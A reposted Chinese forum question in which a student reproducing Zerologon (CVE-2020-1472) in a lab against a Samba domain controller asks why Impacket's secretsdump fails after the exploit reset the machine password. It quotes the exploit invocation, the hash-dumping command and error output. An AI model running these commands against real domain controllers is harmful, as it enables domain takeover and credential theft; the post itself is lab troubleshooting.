微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

Samba AC DC上的Zerologon POC错误

如何解决Samba AC DC上的Zerologon POC错误

我有一个学校项目,要求我在本地环境中模拟 CVE-2020-1472(Zerologon)。 我目前正在尝试测试github script之后的内容,但是遇到了自那时以来一直无法解决的一些问题。

总结一下,我有一个

  • Ubuntu 16.04 计算机和 Samba 4.3.8域控制器Active Directory
  • Windows Server 2019 ,加入了我用Samba创建的域 EXAMPLE.COM

我已经进行了几次测试,并且可以通过 POC 的第一部分成功修改管理员”帐户的密码: ./cve-2020-1472-exploit.py -n EXAMPLE-DC -t 1.2.3.4

尝试运行 impacket 从域中提取一些数据时出现问题:

secretsdump.py -no-pass -just-dc Domain/'DC_NETBIOS_NAME$'@DC_IP_ADDR

它成功登录,但随后我收到此消息:

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] DRSR SessionError: code: 0x20e4 - ERROR_DS_CANT_FIND_EXPECTED_NC - The naming context Could not be found.
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...

更新1: 我也尝试使用-use-vss选项,但登录后也失败。

[-] RemoteOperations Failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Searching for NTDS.dit
[-] 'nonetype' object has no attribute 'request'
[*] Cleaning up...

我试图获取有关DRSR SessionError: code: 0x20e4 - ERROR_DS_CANT_FIND_EXPECTED_NC的信息,但是我没有在互联网上找到任何有用的信息。 我希望有人已经遇到此错误或对Active Directory有所了解,因为我真的很困

提前感谢,祝您一周愉快!

更新2:

我在impacket的github上制作了一个post,似乎DRSUAPI方法之前尚未经过针对非Windows AD的测试。因此Secretsdump无法正常工作。

每个页面都提到 SAMBA 是易受攻击的,所以我想知道他们是否真的进行了测试以利用此漏洞,或者仅仅是理论上的假设。

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。